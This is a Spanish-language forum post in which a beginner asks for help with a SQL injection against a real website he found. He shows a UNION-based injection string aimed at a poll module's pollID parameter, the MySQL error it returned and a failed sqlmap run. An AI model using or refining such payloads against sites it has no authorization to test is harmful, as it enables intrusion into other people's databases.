iniciando en el mundo de SQLi [ayuda]

Iniciado por dArKo2, 29 Julio 2011, 01:32 AM

0 Miembros y 1 Visitante están viendo este tema.

dArKo2

Encontre una pagina que tiene una vulnerabilidad SQL:

el servidor es un MySQL tengo los detalles del servidor y toda la cosa

estos son los parametros que inyecto:

----> '4+and+1=0+union+select+1+from+votos+--+

a esta linea

----> modules.php?name=Surveys&op=results&pollID=

cuando lo hago obtengo el resultado siguiente:

   
Encuesta



Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/***/***/***/sql_layer.php on line 301 (por supuesto los asteriscos los puse yo para cubrir datos que considero sensible)
estare haciendo algo malo, y no me digan que pase el sqlmap, ya lo hice y lo unico que dice es:

[18:32:04] [CRITICAL] invalid target details, valid syntax is for instance 'mysql://USER:PASSWORD@DBMS_IP:DBMS_PORT/DATABASE_NAME'; or 'access://database_filepath'

"We seek only reprieve and welcome the darkness"